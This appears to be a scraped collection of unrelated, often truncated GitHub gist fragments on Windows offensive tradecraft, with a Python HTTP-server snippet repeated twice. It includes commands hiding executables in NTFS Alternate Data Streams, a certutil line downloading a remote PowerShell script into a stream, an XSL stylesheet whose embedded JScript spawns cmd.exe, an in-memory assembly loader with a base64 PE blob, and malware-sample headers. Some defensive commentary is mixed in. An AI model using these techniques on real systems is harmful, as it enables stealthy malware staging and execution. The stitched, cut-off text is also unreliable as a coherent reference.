Each of these commands will run an ad hoc HTTP static server serving your current (or specified) directory at http://localhost:8000. Note that they listen on all interfaces by default, so the directory is also reachable by other hosts on the network unless you bind to 127.0.0.1 or firewall the port. Use this power wisely.
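$ python -m SimpleHTTPServer 8000
# Python 2 only (EOL). Python 3 equivalent below; both listen on all interfaces
# by default, so add --bind to keep the server on loopback when sharing locally.
$ python3 -m http.server 8000 --bind 127.0.0.1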
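REM Write content into NTFS Alternate Data Streams (ADS). Each command stores a
REM payload under a "host:stream" path; the host file's size and default stream are
REM unchanged, so plain directory listings and naive scanners do not show it.
REM Hunting/forensics: `dir /R` and PowerShell `Get-Item -Path <file> -Stream *`
REM enumerate streams; Sysmon Event ID 15 (FileCreateStreamHash) logs stream
REM creation when the config enables it. ADS are dropped on copy to non-NTFS media.

REM type: redirect a file into an ADS of an existing log file (no new file on disk)
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

REM extrac32: expand a CAB straight into an ADS
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

REM findstr /V /L: the literal is chosen to match nothing, so every line is
REM passed through unchanged - effectively a copy into the ADS
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

REM certutil -urlcache: fetch a remote file into an ADS of the c:\temp *directory*
REM (directories can carry streams too). The URL here is third-party and untrusted;
REM use infrastructure you control. NOTE: -urlcache also leaves a cached copy in the
REM per-user CryptnetUrlCache folder, a durable artifact worth checking during IR.
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

REM makecab: compress a file directly into an ADS
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

REM print /D: treat the ADS path as the output "device"
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe

REM reg export / regedit /E: write registry exports into an ADS
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey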
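# Requires the PowerKrabsEtw module: https://github.com/zacbrown/PowerKrabsEtw
#
# Opens a user-mode ETW trace on Microsoft-Windows-Kernel-Audit-API-Calls, keeps
# only event ID 6, and then filters to events where the calling process differs
# from the target (a cross-process handle open) and the requested access mask has
# bit 0x0002 set. That combination is what this snippet treats as suspicious.
#
# NOTE(review): confirm against the provider manifest which API event ID 6 audits
# and which access right 0x0002 denotes for that handle type before relying on
# this as a detection; the meaning of the bit differs between process and thread
# handles. Creating an ETW session normally needs an elevated session (or
# Performance Log Users membership).
Import-Module .\PowerKrabsEtw

$trace = New-KrabsEtwUserTrace
$provider = New-KrabsEtwUserProvider -ProviderName "Microsoft-Windows-Kernel-Audit-API-Calls"

# Provider-side filter: only event ID 6 reaches the callback.
$filter = New-KrabsEtwCallbackFilter -EventId 6
Set-KrabsEtwCallbackFilter -UserProvider $provider -Filter $filter
Set-KrabsEtwUserProvider -Trace $trace -Provider $provider

# Consumer-side filter: cross-process opens requesting the 0x0002 right.
Start-KrabsEtwUserTrace -Trace $trace | Where-Object { ($_.EtwProcessId -ne $_.TargetProcessId) -and ($_.DesiredAccess -bAnd 0x0002) }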
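# Builds a dynamic assembly entirely in memory and defines two dynamic modules in
# it: 'TempModule' (which receives a public type) and a second module named
# 'hello.dll' that stands in for a netmodule loaded at runtime. Nothing is written
# to disk: AssemblyBuilderAccess::Run allows execution but not saving.
#
# NOTE(review): in-memory assembly loading sidesteps file-based scanning; the
# remaining visibility is the CLR's own AssemblyLoad/ModuleLoad ETW events and,
# on runtimes that support it, AMSI scanning of Assembly.Load - confirm coverage
# on the target platform before treating either as a reliable signal.
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')

# Stub module the in-memory module bytes (decoded further down) will be
# associated with; this mimics the loading of a netmodule at runtime.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')

$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()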
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
using System; | |
using System.IO; | |
using System.Reflection; | |
using System.Runtime.Hosting; | |
public sealed class MyAppDomainManager : AppDomainManager | |
{ | |
public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
{ |
## uploaded by @JohnLaTwC | |
## Sample hash: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058 | |
olevba 0.52dev7 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OpX:MASIHB-- f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058  (olevba flags: M = VBA macros, A = auto-executable macro, S = suspicious keywords, I = IOCs, H = hex-encoded strings, B = base64-encoded strings)
=============================================================================== | |
FILE: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058 | |
Type: OpenXML | |
------------------------------------------------------------------------------- |
## uploaded by @JohnLaTwC | |
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
olevba 0.52dev7 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75  (olevba flags: M = VBA macros, A = auto-executable macro, S = suspicious keywords, H = hex-encoded strings, B = base64-encoded strings; no IOCs flagged)
=============================================================================== | |
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
Type: OLE | |
------------------------------------------------------------------------------- |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
/// <summary>
/// Default constructor; performs no initialization of its own.
/// </summary>
public TestClass()
{
}
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
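<!-- Embedded JScript runs at transform time: WScript.Shell.Run("cmd.exe") spawns
     a shell from whatever process applies this stylesheet. It only fires under an
     MSXML-based transformer with scripting enabled, so the risk is any such tool
     accepting an attacker-supplied XSL. Detection angle: a cmd.exe child whose
     parent is the XSL-processing host. -->
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>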
Each of these commands will run an ad hoc HTTP static server serving your current (or specified) directory at http://localhost:8000. Note that they listen on all interfaces by default, so the directory is also reachable by other hosts on the network unless you bind to 127.0.0.1 or firewall the port. Use this power wisely.
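$ python -m SimpleHTTPServer 8000
# Python 2 only (EOL). Python 3 equivalent below; both listen on all interfaces
# by default, so add --bind to keep the server on loopback when sharing locally.
$ python3 -m http.server 8000 --bind 127.0.0.1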
using System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee |